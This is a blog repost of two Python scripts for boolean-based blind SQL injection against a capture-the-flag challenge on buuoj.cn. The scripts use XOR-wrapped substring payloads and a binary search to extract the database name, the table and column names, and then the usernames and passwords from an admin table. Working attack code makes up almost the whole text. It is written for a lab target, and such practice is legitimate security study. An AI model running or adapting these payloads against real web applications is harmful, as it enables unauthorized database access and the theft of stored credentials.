当前位置：网站首页>Record the blind injection script

Record the blind injection script

2022-04-23 04:38:00 【-Gardenia blue-】

import requests

url= 'http://46206bf0-67f6-43a5-ac69-5d26d094e942.node4.buuoj.cn:81/backend/content_detail.php'

database =""

payload1 = "?id=1^(ascii(substr((select(database())),{},1))>{})^1" # The library is news
payload2 = "?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1"# Table, admin,contents
payload3 ="?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),{},1))>{})^1" # Column name is flag,value
payload4 = "?id=1^(ascii(substr((select(group_concat(id,0x3a,username,0x3a,password))from(admin)),{},1))>{})^1"
for i in range(1,10000):# Dichotomy 
    low = 28
    high = 137
    mid =(low + high) // 2
    while(low < high):
        #payload = payload1.format(i,mid)  # Chaku name 
        #payload = payload2.format(i,mid)  # Look up the name of the table 
        #payload = payload3.format(i,mid)  # Look up the list name 
        payload = payload4.format(i,mid) # check flag

        new_url = url + payload
        r = requests.get(new_url)
        #text=str(r.json())
        #print(new_url)
        if "title" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) //2
    if (mid == 32 or mid == 128):
        break
    #chr() return ascii Corresponding characters 
    database +=chr(mid)
    print(database)

print(database)

import  time
import re
import requests
import string

url = "http://46206bf0-67f6-43a5-ac69-5d26d094e942.node4.buuoj.cn:81/backend/content_detail.php"
flag = ''

def payload(i, j):
    time.sleep(0.2)
    #  Database name ord() Return the corresponding ascii value ,chr() return ascii Corresponding characters 
    #sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    #  Table name admin,contents
    #sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),%d,1))>%d)^1"%(i,j)
    #  Field name 
    #sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),%d,1))>%d)^1"%(i,j)
    #  Inquire about flag
    sql = "1^(ord(substr((select(group_concat(username,0x3a,password))from(admin)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    if "title" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

版权声明
本文为[-Gardenia blue-]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/04/202204230403290555.html

当前位置：网站首页>Record the blind injection script

Record the blind injection script

边栏推荐

猜你喜欢

随机推荐